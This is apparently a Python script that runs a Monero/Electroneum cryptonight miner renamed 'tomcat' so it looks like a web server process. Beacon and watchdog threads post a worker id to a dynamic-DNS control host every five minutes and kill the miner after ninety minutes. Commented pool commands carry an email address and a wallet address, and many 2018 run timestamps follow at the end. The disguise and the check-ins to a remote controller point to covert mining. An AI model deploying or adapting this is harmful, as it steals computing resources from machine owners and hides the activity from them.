import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:07.470007
#2018-02-17 16:04:03.514351
#2018-02-17 17:53:04.981004
#2018-02-17 19:39:02.170098
#2018-02-17 21:28:01.829062
#2018-02-17 23:12:06.740075
#2018-02-18 00:59:06.504710
#2018-02-18 02:47:02.163409
#2018-02-18 04:34:04.298422
#2018-02-18 06:25:09.110606
#2018-02-18 08:14:01.798608
#2018-02-18 10:02:01.699098
#2018-02-18 11:48:06.646881
#2018-02-18 13:33:04.531875
#2018-02-18 15:23:02.184996
#2018-02-18 17:13:01.828965
#2018-02-18 19:01:04.346318
#2018-02-18 20:48:03.812632
#2018-02-18 22:35:07.925970
#2018-02-19 00:23:06.938144
#2018-02-19 02:09:04.098892
#2018-02-19 03:57:03.671116
#2018-02-19 05:42:05.656338
#2018-02-19 07:30:01.638452
#2018-02-19 09:19:06.876154
#2018-02-19 11:09:06.035820
#2018-02-19 12:57:05.460013
#2018-02-19 14:44:04.511622
#2018-02-19 16:34:07.189187
#2018-02-19 18:22:07.065692
#2018-02-19 20:09:06.361478
#2018-02-19 21:59:04.736316
#2018-02-19 23:44:08.769126
#2018-02-20 01:32:04.395739
#2018-02-20 03:21:05.712070
#2018-02-20 05:09:07.622216
#2018-02-20 06:52:06.182921
#2018-02-20 08:38:08.852062
#2018-02-20 10:22:05.423827
#2018-02-20 12:07:07.573953
#2018-02-20 13:54:09.036135
#2018-02-20 15:39:06.039278
#2018-02-20 18:28:06.747715
#2018-02-20 20:19:06.973818
#2018-02-20 22:04:06.819440
#2018-02-20 23:45:06.695921
#2018-02-21 01:28:06.077646
#2018-02-21 03:15:06.944369
#2018-02-21 05:04:01.941602
#2018-02-21 06:52:10.059986
#2018-02-21 08:39:05.160159
#2018-02-21 10:25:01.821055
#2018-02-21 12:12:05.456557
#2018-02-21 14:01:03.851300
#2018-02-21 15:45:03.742364
#2018-02-21 17:37:04.502851
#2018-02-21 19:24:01.838270
#2018-02-21 21:11:01.432271
#2018-02-21 22:59:05.733729
#2018-02-22 00:47:07.518080
#2018-02-22 02:36:05.207788
#2018-02-22 04:22:06.614176
#2018-02-22 06:08:03.943080
#2018-02-22 07:53:06.113529
#2018-02-22 09:42:09.075459
#2018-02-22 11:27:09.671414
#2018-02-22 13:12:06.686629
#2018-02-22 15:01:08.752937
#2018-02-22 16:45:08.380955
#2018-02-22 18:32:08.708647
#2018-02-22 20:25:08.986006
#2018-02-22 22:13:07.989647
#2018-02-23 00:00:13.106389
#2018-02-23 01:49:05.360098
#2018-02-23 03:39:01.750681
#2018-02-23 05:24:04.573246
#2018-02-23 07:10:04.419278
#2018-02-23 09:14:05.691021
#2018-02-23 11:21:07.317649
#2018-02-23 13:11:03.644435
#2018-02-23 14:57:04.793152
#2018-02-23 16:46:09.950924
#2018-02-23 18:32:09.720523
#2018-02-23 20:21:01.836942
#2018-02-23 22:08:06.181492
#2018-02-23 23:57:04.968159
#2018-02-24 01:48:06.368816
#2018-02-24 03:34:07.116971
#2018-02-24 05:18:07.293787
#2018-02-24 07:06:01.831640
#2018-02-24 08:53:01.275932
#2018-02-24 10:59:03.769806
#2018-02-24 12:47:07.067683
#2018-02-24 14:36:05.743445
#2018-02-24 16:22:05.061841
#2018-02-24 18:16:04.713092
#2018-02-24 20:03:01.907459
#2018-02-24 21:46:06.012200
#2018-02-25 00:44:05.912672
#2018-02-25 04:45:06.424197
#2018-02-25 08:55:03.184941